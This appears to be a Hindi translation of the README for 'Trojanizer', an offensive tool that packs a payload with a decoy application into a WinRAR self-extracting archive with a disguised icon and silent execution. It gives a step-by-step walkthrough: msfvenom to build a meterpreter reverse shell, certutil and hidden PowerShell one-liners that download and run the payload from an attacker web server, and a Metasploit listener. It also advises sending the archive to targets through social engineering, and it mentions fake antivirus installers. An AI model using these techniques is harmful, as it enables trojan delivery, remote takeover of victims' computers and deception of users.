
अपने पेलोड को ट्रोजनाइज़ करें - WinRAR (SFX) ऑटोमेटाइज़ेशन - लिनक्स डिस्ट्रोस के तहत
संस्करण रिलीज़ : v1.1 (स्थिर)
लेखक : pedro ubuntu [ r00t-3xp10it ]
कोडनेम: Troia_Revisited
समर्थित डिस्ट्रोस : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017
Trojanizer उपकरण उपयोगकर्ता द्वारा इनपुट की गई दो फाइलों को संपीड़ित करने के लिए WinRAR (SFX) का उपयोग करता है,
और इसे एक SFX निष्पादन योग्य (.exe) संग्रह में बदल देता है। जब SFX संग्रह निष्पादित होता है
तो यह दोनों फाइलों (हमारा पेलोड और वैध एप्लिकेशन) को एक साथ चलाएगा।
संग्रह को निष्पादन के समय लक्ष्य के लिए कम संदिग्ध बनाने के लिए, trojanizer
SFX फ़ाइल के डिफ़ॉल्ट आइकन (.ico) को उपयोगकर्ता द्वारा चुने गए आइकन से बदलने का प्रयास करेगा,
और सभी SFX संग्रह सैंडबॉक्स संदेशों को दबा देगा (Silent=1 | Overwrite=1)।
'Trojanizer ट्रोजन नहीं बनाएगा, लेकिन लक्ष्य के दृष्टिकोण से, यह ट्रोजन व्यवहार की नकल करता है'
(पेलोड को पृष्ठभूमि में निष्पादित करें, जबकि वैध एप्लिकेशन अग्रभूमि में निष्पादित होता है)।
Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (wine में स्थापित)
"Trojanizer.sh आवश्यकतानुसार सभी निर्भरताओं को डाउनलोड/स्थापित करेगा"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
| यह अनुशंसित है कि 'settings' फ़ाइल में विकल्प: SYSTEM_ARCH=[ your_sys_arch ] |
| को संपादित और कॉन्फ़िगर करें, इससे पहले कि आप पहली बार उपकरण चलाने का प्रयास करें। |
╚────────────────────────────────────────────────────────────────────────────────────────────╝
.exe | .bat | .vbs | .ps1
"वे सभी पेलोड जिन्हें विंडोज/SFX स्वचालित रूप से निकाल-निष्पादित कर सकता है"
सुझाव: यदि settings फ़ाइल में 'SINGLE_EXEC=ON' चुना गया है,
तो trojanizer इनपुट के लिए किसी भी प्रकार का एक्सटेंशन स्वीकार करेगा।
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | आदि ..
"वे सभी एप्लिकेशन जिन्हें विंडोज/SFX स्वचालित रूप से निकाल-निष्पादित कर सकता है"
╔─────────────────────────────────────────────────────────────────────────────────────────╗
| Trojanizer 'उन्नत विकल्प' केवल 'settings' फ़ाइल में ही सुलभ हैं, |
| और इन्हें मुख्य उपकरण (Trojanizer.sh) चलाने से पहले ही कॉन्फ़िगर किया जा सकता है |
╚─────────────────────────────────────────────────────────────────────────────────────────╝
-- Presetup उन्नत विकल्प
Trojanizer को दो संपीड़ित फाइलों (SFX संग्रह) के निष्कर्षण/निष्पादन से पहले एक प्रोग्राम + कमांड निष्पादित करने के लिए कॉन्फ़िगर किया जा सकता है।
यह उपयोगकर्ताओं को लक्ष्य प्रणाली में वास्तविक निष्कर्षण होने से पहले एक दूरस्थ कमांड निष्पादित करने के लिए पूर्व-स्थापित सॉफ़्टवेयर का लाभ उठाने की अनुमति देता है।
यदि सक्रिय है, तो trojanizer निष्पादित होने वाले कमांड के लिए (zenity सैंडबॉक्स) पूछेगा
-- single_file_execution
आइए निम्नलिखित परिदृश्य पर विचार करें: आपके पास एक dll पेलोड है जिसे आप इनपुट करना चाहते हैं और निष्कर्षण पर निष्पादित करना चाहते हैं,
लेकिन SFX संग्रह सीधे dll फ़ाइलों को निष्पादित नहीं कर सकते हैं। यह सेटिंग उपयोगकर्ताओं को एक बैच स्क्रिप्ट (.bat) इनपुट करने की अनुमति देती है
जिसका उपयोग dll पेलोड को निष्पादित करने के लिए किया जाएगा।
Trojanizer को बस इतना करना है कि SFX संग्रह को दोनों फाइलों को निकालने और फिर script.bat को निष्पादित करने का निर्देश दे।
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
| single_file_execution स्विच का डिफ़ॉल्ट व्यवहार उपयोगकर्ता द्वारा इनपुट की गई दो फाइलों को |
| संपीड़ित करना है, लेकिन निष्कर्षण के समय केवल एक को निष्पादित करना (दूसरी इनपुट फ़ाइल निष्पादित |
| होगी) .. |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| बहुत से लोगों द्वारा बहुत अच्छा काम किया गया है, विशेष रूप से @subTee, एप्लिकेशन व्हाइटलिस्टिंग बाईपास के संबंध में |
| जो अंततः हम यहाँ चाहते हैं: Microsoft के बिल्ट-इन बाइनरी का दुरुपयोग करके मनमाना कोड निष्पादित करना। |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
निम्नलिखित अभ्यास बताता है कि कैसे trojanizer के 'single_file_execution' और 'Presetup' उन्नत स्विच का उपयोग करके
किसी भी पेलोड को ड्रॉप (दूरस्थ डाउनलोड) और निष्पादित करने के लिए 'certutil' या 'powershell' appl_whitelisting_bypass ओनलाइनर का उपयोग किया जाए।
1º - मेटास्प्लॉइट का उपयोग करके अपना पेलोड बनाएं
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º - payload.exe को apache2 वेबरूट पर कॉपी करें और सेवा शुरू करें
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - Trojanizer 'settings' फ़ाइल संपादित करें और सक्रिय करें:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - trojanizer उपकरण चलाना
संपीड़ित करने के लिए पेलोड => <path-to>/screenshot.png (इससे कोई फर्क नहीं पड़ता कि आप क्या संपीड़ित करते हैं)
निष्कर्षण पर इस फ़ाइल को निष्पादित करें => <path-to>/AngryBirds.exe (डिकॉय एप्लिकेशन के रूप में निष्पादित करने के लिए)
PRESETUP सैंडबॉक्स => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
SFX फ़ाइल नाम => AngryBirds_installer (बनाए जाने वाले SFX संग्रह का नाम)
आइकन बदलें => Windows-Store.ico या Steam-logo.ico
5º - एक लिसनर शुरू करें, और सोशल इंजीनियरिंग का उपयोग करके SFX संग्रह को लक्ष्य पर भेजें
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
| जब SFX संग्रह निष्पादित होता है, तो यह हमारे apache2 वेबसर्वर से payload.exe को लक्ष्य पर डाउनलोड करेगा और |
| 'screenshot.png' और 'AngryBirds.exe' को निकालने से पहले इसे निष्पादित करेगा (अंतिम वाला डिकॉय के रूप में काम करेगा) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝
निम्नलिखित ओनलाइनर पिछले 'certutil' अभ्यास के समान परिणाम प्राप्त करने के लिए 'powershell(Downloadfile+start)' विधि का उपयोग करता है ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
निम्नलिखित ओनलाइनर लगभग समान परिणाम प्राप्त करने के लिए 'powershell(IEX+downloadstring)' विधि का उपयोग करता है (payload.ps1 डिस्क को स्पर्श नहीं करता है)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
1º - github से फ्रेमवर्क डाउनलोड करें
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - फ़ाइलों के निष्पादन अनुमतियाँ सेट करें
cd trojanizer
sudo chmod +x *.sh
3º - फ्रेमवर्क कॉन्फ़िगर करें
nano settings
4º - मुख्य उपकरण चलाएं
sudo ./Trojanizer.sh
xsf.conf - निष्कर्षण पर दोनों फ़ाइलों को निष्पादित करें (ट्रोजन व्यवहार)
xsf.conf - single_file_execution + Presetup (उन्नत विकल्प)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
आइकन बदलने के साथ अंतिम sfx संग्रह
SFX संग्रह के अंदर (winrar के साथ खोलें) - ट्रोजन व्यवहार
SFX संग्रह के अंदर (winrar के साथ खोलें) - single_file_execution
Trojanizer - AVG एंटी-वायरस नकली इंस्टॉलर (ट्रोजन व्यवहार)
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (ट्रोजन व्यवहार नहीं)
https://www.youtube.com/watch?v=Ze0JkVtKbns
@subTee | @enigma0x3 | @H4d3s (SSA)
संदर्भ:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
https://github.com/r00t-3xp10it/trojanizer/issues